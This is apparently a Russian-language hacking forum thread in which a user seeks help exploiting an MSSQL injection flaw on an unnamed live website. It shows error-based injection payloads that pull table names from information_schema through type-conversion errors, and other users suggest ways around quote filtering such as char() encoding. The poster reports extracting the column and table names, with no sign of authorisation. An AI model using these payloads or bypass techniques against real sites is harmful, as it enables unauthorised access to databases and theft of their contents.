[Microsoft][ODBC SQL Server Driver]

Хай.
Короче есть проблема которую нужно решить
Существует сайт.
На сайте инъекция (MSSQL)
При запросе такого вида:
===============================
-1+select+top+1+table_name+from+information_schema.tables
===============================

В ошибке выводится имя таблицы:
===============================
[Microsoft][ODBC SQL Server Driver][SQL Server]Syntax error converting the nvarchar value 'Products' to a column of data type int
===============================

Одна таблица есть, пробую вытащить имя второй таблицы таким запросом:
===============================
select+top+1+table_name+from+information_schema.tables+where+table_name+not+in('Products')
===============================

На что сервак мне отвечает:
===============================
[Microsoft][ODBC SQL Server Driver][SQL Server]Line 6: Incorrect syntax near 'Products'
===============================

На многих серваках этот приём срабатывал.....
Ошибка синтаксиса, хмм..
В чем же она заключается???

 

после in пробел есть?

 

угу

 

мб забыл -- поставить?

 

нет, комент там и не нужен все ок
Может есть какиенить альтернативы по перебору колонок?

 

попробуй скобки убрать, т.е. просто table_name+not+in+'Products'

 

Спасибо попробую

 

Попробовал, вот что мне вылезло:
============================
Incorrect syntax near ''
============================

 

Решение - кинь ссылку, вторую теу уже создаешь )

 

хм интересено, если 'Products' перевести в вид "char(....)"
типа :

================================
select+top+1+table_name+from+information_schema.tables+where+table_name+not+in(char(....))
================================

 

я те аналог в предыдушей теме приводил.

 

В том что ты привел используются кавычки, на которые соответственно серв ругается.........

 

Ну раз свежих идей больше нету, то придется самому копать......

 

Колонки успешно вытянул методом с ordinal_position
А для вытягивания имён таблиц что юзать?

 

Таблицы получены.